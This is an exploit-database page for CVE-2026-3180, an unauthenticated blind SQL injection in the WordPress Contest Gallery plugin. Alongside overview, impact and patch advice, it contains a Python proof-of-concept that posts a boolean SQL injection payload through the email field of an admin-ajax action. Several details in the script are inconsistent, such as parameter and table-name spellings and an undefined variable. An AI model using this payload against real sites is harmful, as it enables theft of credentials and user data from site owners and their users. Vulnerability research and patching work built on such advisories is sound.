Skip to main content
Home/Exploits/WebApps/WordPress Contest Gallery 28.1.4 – Unauthenticated Blind SQL Injection
EXPLOIT HIGH (8.8)

WordPress Contest Gallery 28.1.4 – Unauthenticated Blind SQL Injection

CVE ID: CVE-2026-3180
Vulnerability Type: SQL Injection
Author: cardosource
Categories: WebApps

Overview

The WordPress Contest Gallery plugin version 28.1.4 is susceptible to an unauthenticated blind SQL injection vulnerability, identified as CVE-2026-3180. This security flaw allows attackers to execute arbitrary SQL queries against the underlying database without requiring authentication, potentially leading to unauthorized data access and manipulation.

Technical Details

This vulnerability arises from insufficient input validation in the plugin’s handling of user-supplied data. Specifically, when an attacker crafts a malicious request targeting vulnerable endpoints, they can inject SQL queries that the database executes. For instance, an attacker could exploit this flaw by sending specially crafted parameters in the URL, which could allow them to retrieve sensitive information such as user credentials or configuration settings.

Once exploited, the attacker can leverage this access to perform various actions, including data extraction, data modification, or even complete database compromise. The blind nature of the SQL injection means that the attacker may not receive direct feedback from the database, but they can infer results based on the application’s behavior.

Impact

The potential consequences of this vulnerability are severe. An attacker could gain unauthorized access to sensitive information stored in the WordPress database, including user data, payment information, or even administrative credentials. This breach can lead to further attacks, such as account takeovers or complete site defacement, ultimately damaging the reputation and trustworthiness of the affected website.

Mitigation

To protect against CVE-2026-3180, it is crucial for site administrators to immediately update the WordPress Contest Gallery plugin to the latest version, where this vulnerability is patched. Regularly monitoring and updating all WordPress plugins is a best practice that can significantly reduce the attack surface.

Additionally, implementing Web Application Firewalls (WAF) can help detect and block malicious SQL injection attempts. Security professionals should also conduct regular security audits and vulnerability assessments to identify and remediate any potential weaknesses within their web applications. Educating users about the importance of strong authentication practices can further enhance security posture.

Proof of Concept (PoC)

poc.py 
# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
# Google Dork:  N/A
# Date: 2026-06-02
# Exploit Author: cardosource
# Vendor Homepage: https://contest-gallery.com/
# Software Link: https://wordpress.org/plugins/contest-gallery/
# Version: <= 28.1.4
# Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)
# CVE: 2026-3180


"""
Description

A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is caused by the unsafe use of the cgl_maili parameter, where sanitize_email() preserves the single quote (') character in the local part of an email address. As a result, user-controlled input reaches wpdb->get_row() without proper parameterization via prepare(), allowing unauthenticated attackers to perform boolean-based blind SQL injection.
Authentication Required: No

"""


import requests
import json

NONCE = " "
URL = "http://localhost:8080/wp-admin/admin-ajax.php"
endpoint = "/wp-admin/admin-ajax.php"
url = "http://localhost:8080/"
payload = "'OR/**/1=1#@teste.com' and 'OR/**/1=2#@teste.com"

def send_payload(mail):
    data = {
        "action": "post_cg1l_resend_unconfirmed_mail_frontend",
        "cgl_mail": mail,
        "cgl_page_id": "1",
        "cgl_activation_key": "",
        "cg_nonce": NONCE,
    }
    return requests.post(URL, data=data)

r_true = send_payload("qualquer'OR/**/1=1#@teste.com")

if r_true.status_code == 200:
    status_code = r_true.status_code
        

banner = f"""
CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi

payload :........................{payload}
end point :........................{endpoint}
url :..............................{url}
status :...........................{status_code}
nonce :............................{NONCE}
"""

print(banner)
print(f"Body length: {len(r_true.text)} chars")

poc =f'''nmariadb wordpress_db -e "
SELECT * FROM wp_contest_gal1ery_create_user_entries 
ORDER BY Tstamp DESC LIMIT 1115;"'''

print(poc)

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...